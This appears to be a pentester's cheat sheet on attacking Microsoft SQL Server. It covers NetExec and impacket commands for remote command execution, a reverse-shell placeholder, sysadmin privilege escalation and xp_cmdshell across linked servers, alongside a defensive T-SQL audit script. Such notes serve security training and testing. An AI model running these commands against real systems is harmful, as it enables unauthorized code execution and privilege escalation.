
MsSQL - 1433

Microsoft SQL Server (MS SQL) is a relational database management system developed by Microsoft that supports a wide variety of transaction processing, business intelligence, and analytics applications. It uses Transact-SQL (T-SQL), Microsoft's proprietary extension of SQL, to interact with the database.

  • Default port: 1433

Connecting to MSSQL Remotely

# Using Impacket MSSQL Client
python3 /opt/impacket/build/scripts-3.12/mssqlclient.py 'sqladm_usr':'CoolPass123@'@10.10.10.10 -windows-auth

# Using Sqsh
sqsh -S 10.10.10.10 -U Jethalal -P 'CoolJethalal123@' -h
sqsh -S 10.10.10.10 -U .\\sqladm_usr -P 'CoolPass123@' -h

Enumeration & Attacks

If we obtain credentials for a user with database admin or other MSSQL permissions, or even just a SQL service account, we can use NetExec/CrackMapExec to enumerate and attack the instance remotely. There are various ways to do this, but NetExec/CrackMapExec makes life easier.

Info: If we see (Pwn3d!) in the NetExec output, it means that the account is Database Admin.

Execute Queries

nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "SELECT name FROM master.dbo.sysdatabases"
nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "QUERY HERE"

# If the account is a SQL Server login (SQL authentication rather than a Windows/domain account), add the flag '--local-auth'.

Execute Windows Commands

# Execute Windows Commands
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "whoami"
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "revshells.com powershell (#3)"

Privilege Escalation Module

NetExec's mssql_priv module helps escalate MSSQL user privileges to sysadmin. It checks two methods: EXECUTE AS LOGIN and the db_owner role. The module has three options:

  • enum_privs (default) to list privileges
  • privesc to escalate
  • rollback to revert changes

# List Options
nxc mssql -M mssql_priv --options

# Check if user 'rezydev' can impersonate sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv

# If yes, use option 'privesc' to escalate and now rezydev is also sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv -o ACTION=privesc

# Since above command made our user sysadmin, we can now use -x to execute commands
# as sysadmin user.

# We can also use '-o ACTION=rollback' to revert previous action.
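The two conditions mssql_priv looks for can be audited directly in T-SQL. The following is an added example of mine, not NetExec's code: it reports which logins the current login may impersonate (the EXECUTE AS LOGIN path) and which TRUSTWORTHY databases owned by a sysadmin the current login is db_owner of (the db_owner path). It assumes only the standard catalog views and is run as the login under review, so a defender can confirm or rule out the path before (or after) running the module.

```sql
-- Part 1 (EXECUTE AS LOGIN path): IMPERSONATE grants held by the current login.
-- A row with target_is_sysadmin = 1 is the condition the 'privesc' action relies on.
SELECT
    SUSER_SNAME()                         AS grantee_login,
    pr.name                               AS impersonable_login,
    IS_SRVROLEMEMBER('sysadmin', pr.name) AS target_is_sysadmin
FROM sys.server_permissions AS pe
JOIN sys.server_principals  AS pr ON pr.principal_id = pe.major_id
WHERE pe.class = 101                      -- 101 = SERVER_PRINCIPAL (a login)
  AND pe.permission_name = 'IMPERSONATE'
  AND pe.state IN ('G', 'W')              -- GRANT / GRANT WITH GRANT OPTION
  AND pe.grantee_principal_id = SUSER_ID();

-- Part 2 (db_owner path): TRUSTWORTHY databases owned by a sysadmin login,
-- with the current login's db_owner membership checked inside each one.
DECLARE @db  sysname,
        @sql nvarchar(max);
DECLARE db_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT name
    FROM sys.databases
    WHERE is_trustworthy_on = 1
      AND state_desc = 'ONLINE'
      AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(owner_sid)) = 1;
OPEN db_cur;
FETCH NEXT FROM db_cur INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- USE and SELECT in one batch: the context switch lasts only for this batch.
    SET @sql = N'USE ' + QUOTENAME(@db) + N';
        SELECT DB_NAME()               AS trustworthy_db,
               IS_MEMBER(''db_owner'') AS current_login_is_db_owner;';
    BEGIN TRY
        EXEC sp_executesql @sql;
    END TRY
    BEGIN CATCH
        -- Typically error 916: the login has no user mapping in this database,
        -- so it cannot be db_owner there.
        SELECT @db            AS trustworthy_db,
               NULL           AS current_login_is_db_owner,
               ERROR_MESSAGE() AS note;
    END CATCH;
    FETCH NEXT FROM db_cur INTO @db;
END;
CLOSE db_cur;
DEALLOCATE db_cur;
```

Note that grants made to a Windows group the login belongs to appear under the group's principal_id rather than SUSER_ID(), so a clean Part 1 result does not by itself rule out the impersonation path; msdb is TRUSTWORTHY by default and will show up in Part 2.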

Communicate with other Databases

-- Enumerate linked servers
EXEC sp_linkedservers;

-- Get details on a linked server
EXEC sp_helpserver;

-- Execute a command on the linked server (if allowed)
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKEDSRVNAME];

-- Read data from remote DB
SELECT * FROM OPENQUERY([LINKEDSRVNAME], 'SELECT name FROM master..sysdatabases');